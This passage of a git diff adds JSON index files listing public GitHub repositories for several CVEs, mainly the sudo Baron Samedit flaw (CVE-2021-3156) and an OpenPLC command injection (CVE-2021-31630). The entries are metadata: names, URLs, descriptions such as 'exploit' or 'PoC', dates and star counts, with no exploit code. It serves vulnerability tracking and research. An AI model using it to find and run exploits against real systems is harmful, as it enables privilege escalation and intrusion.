+ "html_url": "https:\/\/github.com\/d3c3ptic0n"
+ },
+ "html_url": "https:\/\/github.com\/d3c3ptic0n\/CVE-2021-3156",
+ "description": "Sudo heap-based buffer overflow privilege escalation commands and mitigations.",
+ "fork": false,
+ "created_at": "2021-09-27T06:09:06Z",
+ "updated_at": "2021-10-29T14:15:54Z",
+ "pushed_at": "2021-08-16T01:26:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 416842203,
+ "name": "CVE-2021-3156",
+ "full_name": "musergi\/CVE-2021-3156",
+ "owner": {
+ "login": "musergi",
+ "id": 39805012,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39805012?v=4",
+ "html_url": "https:\/\/github.com\/musergi"
+ },
+ "html_url": "https:\/\/github.com\/musergi\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-13T17:43:51Z",
+ "updated_at": "2021-12-03T00:25:23Z",
+ "pushed_at": "2021-12-01T13:51:47Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 419229376,
+ "name": "CVE-2021-3156",
+ "full_name": "halissha\/CVE-2021-3156",
+ "owner": {
+ "login": "halissha",
+ "id": 68551861,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68551861?v=4",
+ "html_url": "https:\/\/github.com\/halissha"
+ },
+ "html_url": "https:\/\/github.com\/halissha\/CVE-2021-3156",
+ "description": "CVE-2021-3156 exploit",
+ "fork": false,
+ "created_at": "2021-10-20T07:34:53Z",
+ "updated_at": "2021-10-20T07:49:13Z",
+ "pushed_at": "2021-10-20T07:48:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 423517851,
+ "name": "Baron-Samedit",
+ "full_name": "sharkmoos\/Baron-Samedit",
+ "owner": {
+ "login": "sharkmoos",
+ "id": 23018541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23018541?v=4",
+ "html_url": "https:\/\/github.com\/sharkmoos"
+ },
+ "html_url": "https:\/\/github.com\/sharkmoos\/Baron-Samedit",
+ "description": "Exploit and Demo system for CVE-2021-3156",
+ "fork": false,
+ "created_at": "2021-11-01T15:30:41Z",
+ "updated_at": "2022-08-21T09:02:36Z",
+ "pushed_at": "2022-01-23T16:37:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452513353,
+ "name": "CVE-2021-3156",
+ "full_name": "chenaotian\/CVE-2021-3156",
+ "owner": {
+ "login": "chenaotian",
+ "id": 86546351,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4",
+ "html_url": "https:\/\/github.com\/chenaotian"
+ },
+ "html_url": "https:\/\/github.com\/chenaotian\/CVE-2021-3156",
+ "description": "CVE-2021-3156 POC and Docker and Analysis write up",
+ "fork": false,
+ "created_at": "2022-01-27T02:31:43Z",
+ "updated_at": "2024-05-28T15:37:20Z",
+ "pushed_at": "2022-05-23T01:51:14Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 459014327,
+ "name": "SudoScience",
+ "full_name": "ret2basic\/SudoScience",
+ "owner": {
+ "login": "ret2basic",
+ "id": 59381775,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59381775?v=4",
+ "html_url": "https:\/\/github.com\/ret2basic"
+ },
+ "html_url": "https:\/\/github.com\/ret2basic\/SudoScience",
+ "description": "CVE-2021-3156 deep dive.",
+ "fork": false,
+ "created_at": "2022-02-14T04:24:03Z",
+ "updated_at": "2022-04-08T08:32:31Z",
+ "pushed_at": "2022-04-08T08:32:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 466126446,
+ "name": "CVE-2021-3156",
+ "full_name": "puckiestyle\/CVE-2021-3156",
+ "owner": {
+ "login": "puckiestyle",
+ "id": 57447087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
+ "html_url": "https:\/\/github.com\/puckiestyle"
+ },
+ "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-04T13:06:51Z",
+ "updated_at": "2022-06-12T04:07:19Z",
+ "pushed_at": "2022-03-04T13:11:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 468145866,
+ "name": "CVE-2021-3156",
+ "full_name": "barebackbandit\/CVE-2021-3156",
+ "owner": {
+ "login": "barebackbandit",
+ "id": 30201584,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30201584?v=4",
+ "html_url": "https:\/\/github.com\/barebackbandit"
+ },
+ "html_url": "https:\/\/github.com\/barebackbandit\/CVE-2021-3156",
+ "description": "Exploit for CVE-2021-3156",
+ "fork": false,
+ "created_at": "2022-03-10T01:03:47Z",
+ "updated_at": "2022-01-30T06:58:31Z",
+ "pushed_at": "2022-01-30T06:58:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 471181143,
+ "name": "CVE-2021-3156",
+ "full_name": "RodricBr\/CVE-2021-3156",
+ "owner": {
+ "login": "RodricBr",
+ "id": 72948934,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72948934?v=4",
+ "html_url": "https:\/\/github.com\/RodricBr"
+ },
+ "html_url": "https:\/\/github.com\/RodricBr\/CVE-2021-3156",
+ "description": "CVE-2021-3156",
+ "fork": false,
+ "created_at": "2022-03-18T00:05:48Z",
+ "updated_at": "2022-03-19T12:58:55Z",
+ "pushed_at": "2022-08-19T20:56:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 472565119,
+ "name": "heaplens",
+ "full_name": "ypl6\/heaplens",
+ "owner": {
+ "login": "ypl6",
+ "id": 24860299,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24860299?v=4",
+ "html_url": "https:\/\/github.com\/ypl6"
+ },
+ "html_url": "https:\/\/github.com\/ypl6\/heaplens",
+ "description": "CMPT733 Cybersecurity Lab II Project: GDB plugin for heap exploits inspired by CVE-2021-3156",
+ "fork": false,
+ "created_at": "2022-03-22T00:55:51Z",
+ "updated_at": "2022-04-13T03:38:58Z",
+ "pushed_at": "2022-04-13T01:16:07Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 496459351,
+ "name": "CVE-2021-3156",
+ "full_name": "q77190858\/CVE-2021-3156",
+ "owner": {
+ "login": "q77190858",
+ "id": 10094838,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10094838?v=4",
+ "html_url": "https:\/\/github.com\/q77190858"
+ },
+ "html_url": "https:\/\/github.com\/q77190858\/CVE-2021-3156",
+ "description": "sudo提权漏洞CVE-2021-3156复现代码",
+ "fork": false,
+ "created_at": "2022-05-26T02:47:53Z",
+ "updated_at": "2022-05-26T08:31:05Z",
+ "pushed_at": "2022-05-26T02:49:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 506991349,
+ "name": "CVE-2021-3156",
+ "full_name": "arvindshima\/CVE-2021-3156",
+ "owner": {
+ "login": "arvindshima",
+ "id": 88944344,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88944344?v=4",
+ "html_url": "https:\/\/github.com\/arvindshima"
+ },
+ "html_url": "https:\/\/github.com\/arvindshima\/CVE-2021-3156",
+ "description": "CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)",
+ "fork": false,
+ "created_at": "2022-06-24T11:50:40Z",
+ "updated_at": "2022-06-24T12:00:19Z",
+ "pushed_at": "2022-06-24T11:55:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 510379940,
+ "name": "CVE-2021-3156",
+ "full_name": "Mhackiori\/CVE-2021-3156",
+ "owner": {
+ "login": "Mhackiori",
+ "id": 73738800,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73738800?v=4",
+ "html_url": "https:\/\/github.com\/Mhackiori"
+ },
+ "html_url": "https:\/\/github.com\/Mhackiori\/CVE-2021-3156",
+ "description": "Visualization, Fuzzing, Exploit and Patch of Baron Samedit Vulnerability",
+ "fork": false,
+ "created_at": "2022-07-04T13:55:24Z",
+ "updated_at": "2023-12-05T12:08:06Z",
+ "pushed_at": "2022-07-15T04:41:17Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3156",
+ "pwn",
+ "sudo"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 561329535,
+ "name": "CVE-2021-3156-centos7",
+ "full_name": "PhuketIsland\/CVE-2021-3156-centos7",
+ "owner": {
+ "login": "PhuketIsland",
+ "id": 28825226,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28825226?v=4",
+ "html_url": "https:\/\/github.com\/PhuketIsland"
+ },
+ "html_url": "https:\/\/github.com\/PhuketIsland\/CVE-2021-3156-centos7",
+ "description": "利用sudo提权,只针对cnetos7",
+ "fork": false,
+ "created_at": "2022-11-03T13:10:23Z",
+ "updated_at": "2023-12-27T07:31:39Z",
+ "pushed_at": "2022-11-03T13:52:35Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 571582101,
+ "name": "clif",
+ "full_name": "0x4ndy\/clif",
+ "owner": {
+ "login": "0x4ndy",
+ "id": 40269655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40269655?v=4",
+ "html_url": "https:\/\/github.com\/0x4ndy"
+ },
+ "html_url": "https:\/\/github.com\/0x4ndy\/clif",
+ "description": "clif is a command-line interface (CLI) application fuzzer, pretty much what wfuzz or ffuf are for web. It was inspired by sudo vulnerability CVE-2021-3156 and the fact that for some reasons, Google's afl-fuzz doesn't allow for unlimited argument or option specification.",
+ "fork": false,
+ "created_at": "2022-11-28T12:52:11Z",
+ "updated_at": "2024-05-16T19:50:05Z",
+ "pushed_at": "2022-12-22T12:38:31Z",
+ "stargazers_count": 98,
+ "watchers_count": 98,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 98,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 581961241,
+ "name": "CVE-2021-3156",
+ "full_name": "meowhua15\/CVE-2021-3156",
+ "owner": {
+ "login": "meowhua15",
+ "id": 74200918,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74200918?v=4",
+ "html_url": "https:\/\/github.com\/meowhua15"
+ },
+ "html_url": "https:\/\/github.com\/meowhua15\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-12-25T03:58:20Z",
+ "updated_at": "2022-12-25T06:19:54Z",
+ "pushed_at": "2023-11-14T10:24:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 639593327,
+ "name": "CVE-2021-3156",
+ "full_name": "mutur4\/CVE-2021-3156",
+ "owner": {
+ "login": "mutur4",
+ "id": 68686790,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68686790?v=4",
+ "html_url": "https:\/\/github.com\/mutur4"
+ },
+ "html_url": "https:\/\/github.com\/mutur4\/CVE-2021-3156",
+ "description": "Baron SameEdit Heap Overflow LPE 1-Day Exploit",
+ "fork": false,
+ "created_at": "2023-05-11T19:38:16Z",
+ "updated_at": "2024-02-10T19:16:59Z",
+ "pushed_at": "2024-04-10T14:50:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 640090227,
+ "name": "PE_CVE-CVE-2021-3156",
+ "full_name": "PurpleOzone\/PE_CVE-CVE-2021-3156",
+ "owner": {
+ "login": "PurpleOzone",
+ "id": 111320119,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111320119?v=4",
+ "html_url": "https:\/\/github.com\/PurpleOzone"
+ },
+ "html_url": "https:\/\/github.com\/PurpleOzone\/PE_CVE-CVE-2021-3156",
+ "description": "Exploit for Ubuntu 20.04 using CVE-2021-3156 enhanced with post-exploitation scripts",
+ "fork": false,
+ "created_at": "2023-05-13T01:02:32Z",
+ "updated_at": "2024-06-06T01:10:39Z",
+ "pushed_at": "2023-05-13T07:48:55Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 687513603,
+ "name": "CVE-2021-3156",
+ "full_name": "asepsaepdin\/CVE-2021-3156",
+ "owner": {
+ "login": "asepsaepdin",
+ "id": 122620685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4",
+ "html_url": "https:\/\/github.com\/asepsaepdin"
+ },
+ "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-05T14:06:26Z",
+ "updated_at": "2023-09-05T14:23:34Z",
+ "pushed_at": "2023-09-05T14:23:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 690307610,
+ "name": "Y3A-CVE-2021-3156",
+ "full_name": "EthicalSecurity-Agency\/Y3A-CVE-2021-3156",
+ "owner": {
+ "login": "EthicalSecurity-Agency",
+ "id": 128076110,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128076110?v=4",
+ "html_url": "https:\/\/github.com\/EthicalSecurity-Agency"
+ },
+ "html_url": "https:\/\/github.com\/EthicalSecurity-Agency\/Y3A-CVE-2021-3156",
+ "description": "Y3A \/ CVE-2021-3156",
+ "fork": false,
+ "created_at": "2023-09-12T00:23:42Z",
+ "updated_at": "2023-09-12T00:23:42Z",
+ "pushed_at": "2021-09-07T03:36:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736124550,
+ "name": "CVE-2021-3156",
+ "full_name": "DDayLuong\/CVE-2021-3156",
+ "owner": {
+ "login": "DDayLuong",
+ "id": 154918019,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154918019?v=4",
+ "html_url": "https:\/\/github.com\/DDayLuong"
+ },
+ "html_url": "https:\/\/github.com\/DDayLuong\/CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-27T03:52:17Z",
+ "updated_at": "2023-12-27T03:54:33Z",
+ "pushed_at": "2023-12-27T03:54:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 746480394,
+ "name": "CVE-2021-3156",
+ "full_name": "wurwur\/CVE-2021-3156",
+ "owner": {
+ "login": "wurwur",
+ "id": 38003239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38003239?v=4",
+ "html_url": "https:\/\/github.com\/wurwur"
+ },
+ "html_url": "https:\/\/github.com\/wurwur\/CVE-2021-3156",
+ "description": "Different files for computer security coursework",
+ "fork": false,
+ "created_at": "2024-01-22T04:42:34Z",
+ "updated_at": "2024-01-22T06:44:07Z",
+ "pushed_at": "2024-01-22T08:07:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 756290635,
+ "name": "LMU-CVE-2021-3156",
+ "full_name": "SamTruss\/LMU-CVE-2021-3156",
+ "owner": {
+ "login": "SamTruss",
+ "id": 46684055,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46684055?v=4",
+ "html_url": "https:\/\/github.com\/SamTruss"
+ },
+ "html_url": "https:\/\/github.com\/SamTruss\/LMU-CVE-2021-3156",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-12T11:24:31Z",
+ "updated_at": "2024-02-12T11:24:32Z",
+ "pushed_at": "2024-02-12T14:31:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800600797,
+ "name": "CVE-2021-3156-checker",
+ "full_name": "lypd0\/CVE-2021-3156-checker",
+ "owner": {
+ "login": "lypd0",
+ "id": 146327014,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146327014?v=4",
+ "html_url": "https:\/\/github.com\/lypd0"
+ },
+ "html_url": "https:\/\/github.com\/lypd0\/CVE-2021-3156-checker",
+ "description": "Checker for CVE-2021-3156 with static version check",
+ "fork": false,
+ "created_at": "2024-05-14T16:35:09Z",
+ "updated_at": "2024-06-23T13:14:26Z",
+ "pushed_at": "2024-05-14T17:04:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "checker",
+ "cve",
+ "cve-2021-3156",
+ "escalation",
+ "privesc",
+ "privilege",
+ "python"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3157.json b/2021/CVE-2021-3157.json
new file mode 100644
index 0000000000..34f998886c
--- /dev/null
+++ b/2021/CVE-2021-3157.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 333708745,
+ "name": "cve-2021-3157",
+ "full_name": "CrackerCat\/cve-2021-3157",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/cve-2021-3157",
+ "description": "脚本小子竟是我自己?",
+ "fork": false,
+ "created_at": "2021-01-28T09:27:49Z",
+ "updated_at": "2022-01-07T08:58:03Z",
+ "pushed_at": "2021-01-28T02:57:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31589.json b/2021/CVE-2021-31589.json
new file mode 100644
index 0000000000..645f7b8eed
--- /dev/null
+++ b/2021/CVE-2021-31589.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 629907373,
+ "name": "CVE-2021-31589",
+ "full_name": "karthi-the-hacker\/CVE-2021-31589",
+ "owner": {
+ "login": "karthi-the-hacker",
+ "id": 33289300,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4",
+ "html_url": "https:\/\/github.com\/karthi-the-hacker"
+ },
+ "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2021-31589",
+ "description": "CVE-2021-31589 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.",
+ "fork": false,
+ "created_at": "2023-04-19T09:10:40Z",
+ "updated_at": "2024-01-19T23:21:15Z",
+ "pushed_at": "2023-04-27T04:26:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31630.json b/2021/CVE-2021-31630.json
new file mode 100644
index 0000000000..a683ae699b
--- /dev/null
+++ b/2021/CVE-2021-31630.json
@@ -0,0 +1,217 @@
+[
+ {
+ "id": 391818469,
+ "name": "CVE-2021-31630-OpenPLC_RCE",
+ "full_name": "hev0x\/CVE-2021-31630-OpenPLC_RCE",
+ "owner": {
+ "login": "hev0x",
+ "id": 6265911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4",
+ "html_url": "https:\/\/github.com\/hev0x"
+ },
+ "html_url": "https:\/\/github.com\/hev0x\/CVE-2021-31630-OpenPLC_RCE",
+ "description": "Exploit for Authenticated Remote Code Execution on OpenPLC v3 Webserver",
+ "fork": false,
+ "created_at": "2021-08-02T04:48:24Z",
+ "updated_at": "2023-09-28T11:30:04Z",
+ "pushed_at": "2021-08-02T04:48:25Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 775165945,
+ "name": "CVE-2021-31630-HTB",
+ "full_name": "Hunt3r0x\/CVE-2021-31630-HTB",
+ "owner": {
+ "login": "Hunt3r0x",
+ "id": 106396603,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106396603?v=4",
+ "html_url": "https:\/\/github.com\/Hunt3r0x"
+ },
+ "html_url": "https:\/\/github.com\/Hunt3r0x\/CVE-2021-31630-HTB",
+ "description": "proof of Concept (PoC) exploit for CVE-2021-31630, targeting the OpenPLC service running on the WifineticTwo box on the Hack The Box platform.",
+ "fork": false,
+ "created_at": "2024-03-20T22:02:53Z",
+ "updated_at": "2024-06-21T22:49:23Z",
+ "pushed_at": "2024-03-21T15:50:45Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779013491,
+ "name": "cve-2021-31630",
+ "full_name": "thewhiteh4t\/cve-2021-31630",
+ "owner": {
+ "login": "thewhiteh4t",
+ "id": 36354846,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36354846?v=4",
+ "html_url": "https:\/\/github.com\/thewhiteh4t"
+ },
+ "html_url": "https:\/\/github.com\/thewhiteh4t\/cve-2021-31630",
+ "description": "Python script for exploiting command injection in Open PLC Webserver v3",
+ "fork": false,
+ "created_at": "2024-03-28T21:31:45Z",
+ "updated_at": "2024-06-19T08:17:09Z",
+ "pushed_at": "2024-03-28T22:14:23Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "exploit",
+ "openplc",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 786978803,
+ "name": "CVE-2021-31630",
+ "full_name": "mind2hex\/CVE-2021-31630",
+ "owner": {
+ "login": "mind2hex",
+ "id": 51345640,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4",
+ "html_url": "https:\/\/github.com\/mind2hex"
+ },
+ "html_url": "https:\/\/github.com\/mind2hex\/CVE-2021-31630",
+ "description": "OpenPLC 3 WebServer Authenticated Remote Code Execution.",
+ "fork": false,
+ "created_at": "2024-04-15T16:55:30Z",
+ "updated_at": "2024-04-15T16:56:49Z",
+ "pushed_at": "2024-04-15T17:07:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800033894,
+ "name": "CVE-2021-31630-PoC",
+ "full_name": "sealldeveloper\/CVE-2021-31630-PoC",
+ "owner": {
+ "login": "sealldeveloper",
+ "id": 120470330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4",
+ "html_url": "https:\/\/github.com\/sealldeveloper"
+ },
+ "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2021-31630-PoC",
+ "description": "A version of the PoC for CVE-2021-31630 from https:\/\/github.com\/Hunt3r0x\/CVE-2021-31630-HTB but without the political messages, because they are unneccessary.",
+ "fork": false,
+ "created_at": "2024-05-13T15:17:38Z",
+ "updated_at": "2024-05-13T15:21:58Z",
